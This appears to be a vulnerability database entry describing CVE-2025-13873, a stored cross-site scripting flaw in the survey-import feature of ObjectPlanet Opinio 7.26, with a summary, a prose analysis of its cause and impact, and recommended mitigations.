CVE-2025-13873 in Opinio
Summary
by MITRE • 12/02/2025
Stored Cross-Site Scripting (XSS) in the survey-import feature of ObjectPlanet Opinio 7.26 rev12562 on web application allows an attacker to inject arbitrary JavaScript code, which executes in the browsing context of any visitor accessing the compromised survey.
VulDB is the best source for vulnerability data and more expert information about this specific topic.
Analysis
by VulDB Data Team • 12/05/2025
The vulnerability CVE-2025-13873 represents a critical stored cross-site scripting flaw discovered in ObjectPlanet Opinio version 7.26 rev12562 within its survey-import functionality. This issue arises when the application fails to properly sanitize user-supplied data during the import process, allowing malicious actors to inject persistent JavaScript payloads that remain stored within the application's database. The vulnerability specifically affects the survey-import feature, which enables administrators or users to upload survey data from external sources, creating an attack surface where unvalidated input can be transformed into executable code within the victim's browser context.
The technical implementation of this flaw stems from inadequate input validation and output encoding mechanisms within the survey-import module. When survey data is imported, the application does not sufficiently sanitize or escape potentially malicious content that may be embedded within the imported survey structure, particularly in fields such as question text, answer options, or metadata. This failure creates a persistent XSS condition where any JavaScript code injected during the import process is stored server-side and subsequently executed whenever any user accesses the compromised survey, regardless of their privileges or authentication status. The vulnerability operates at the application layer and can be exploited through various import formats including but not limited to xml, csv, or json files containing malicious payloads.
The operational impact of this vulnerability extends beyond simple data theft or defacement, as it enables attackers to execute arbitrary JavaScript code within the browsing context of any survey visitor. This creates numerous attack vectors including session hijacking through cookie theft, credential harvesting from login forms, redirection to malicious sites, and potential exploitation of browser vulnerabilities. The stored nature of the vulnerability means that the malicious code persists indefinitely until manually removed from the application database, making it particularly dangerous for long-running surveys or applications with high user turnover. Attackers can leverage this vulnerability to establish persistent footholds within victim environments, potentially leading to broader compromise of user accounts and sensitive organizational data.
Mitigation strategies for this vulnerability should prioritize immediate input validation and sanitization measures within the survey-import functionality. The application must implement comprehensive data sanitization routines that remove or escape potentially dangerous characters and patterns from imported survey content before storage. Additionally, output encoding should be enforced when displaying imported survey data to prevent JavaScript execution in browser contexts. Security controls should include implementing content security policies that restrict script execution and establishing proper access controls for survey import functionality to limit who can upload potentially malicious content. Organizations should also consider implementing web application firewalls with XSS detection capabilities and regularly monitoring for suspicious import activities. This vulnerability aligns with CWE-79 which specifically addresses cross-site scripting flaws, and represents a clear violation of the principle of least privilege as outlined in NIST SP 800-53 security controls. The attack pattern follows typical XSS exploitation techniques documented in MITRE ATT&CK framework under the T1059.007 sub-technique for Scripting, specifically targeting web application interfaces for persistent code execution.